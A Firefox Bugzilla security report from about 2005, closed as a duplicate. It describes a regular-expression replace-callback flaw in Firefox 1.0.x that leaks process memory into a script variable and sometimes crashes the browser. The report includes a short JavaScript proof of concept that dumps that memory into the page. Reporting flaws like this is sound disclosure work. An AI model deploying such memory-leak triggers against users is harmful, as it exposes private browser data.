Closed Bug 288608 Opened 20 years ago Closed 20 years ago

can access to the memory of firefox process while executing special formed regexp

Categories

(Firefox :: General, defect)

Product:
Firefox
Component:
General
Platform:
x86
Windows Server 2003
Type:
defect
Priority:
Not set
Severity:
critical

Tracking

()

Status:
RESOLVED DUPLICATE of bug 288688

People

(Reporter: inthrax, Assigned: bugzilla)

References

(
URL
)

Details

(Whiteboard: [sg:dupe 288688])

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.7.6) Gecko/20050225 Firefox/1.0.1 Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.7.6) Gecko/20050225 Firefox/1.0.1 When executing special javascript code result value having some binary block, I think that is firefox process memory. Sometimes while processing this operation firefox crashes. Reproducible: Always Steps to Reproduce: 1. Just execute jsvascript function genGluck(str){ var x = str; var rx=/end/i; x = x.replace(rx,function($1){ $1.match(rx); return ""; }); x = x.replace(/^end/,""); return x; } var mem = genGluck( "XXXXXXXXXXXXXXXXend"); document.write(mem); Actual Results: We have in variable called "mem" memory dump in size of "length passed string" - 6 Every time dump is different, but sure, it rely on browser process. Sometimes (avg: one of twenty or more) crashes: Faulting application firefox.exe, version 1.0.1.0, faulting module js3250.dll, version 4.0.0.0, fault address 0x00002b0b. Expected Results: Such regular expression shoult only replace the search word (in example "end") with nothing I've tested this bug on firefox 1.0.1 itself and on firefox 1.0.2 remotely.
I'm a newbie at bugzilla. This is at all the first bug I've added. So if something's wrong - please correct me. Also there is at page http://cubic.xfo.org.ru/index.cgi?read=53004 a lot of tests. Bug affects: Firefox Win32 Firefox Linux (Tested: Debian, SUSE, ASPLinux, Fedora) Epiphany Galeon MultiZilla ... And I think All of Gecko based browsers.
*** This bug has been marked as a duplicate of 288688 ***
Status: UNCONFIRMED → RESOLVED
Closed: 20 years ago
Resolution: --- → DUPLICATE
Whiteboard: [sg:dupe 288688]
Group: security
Thank you very much for reporting this here and setting the security flag. Because this flaw was posted publicly we happened to get multiple reports, but normally that would not be the case and we appreciate your effort to let us know.
You need to log in before you can comment on or make changes to this bug.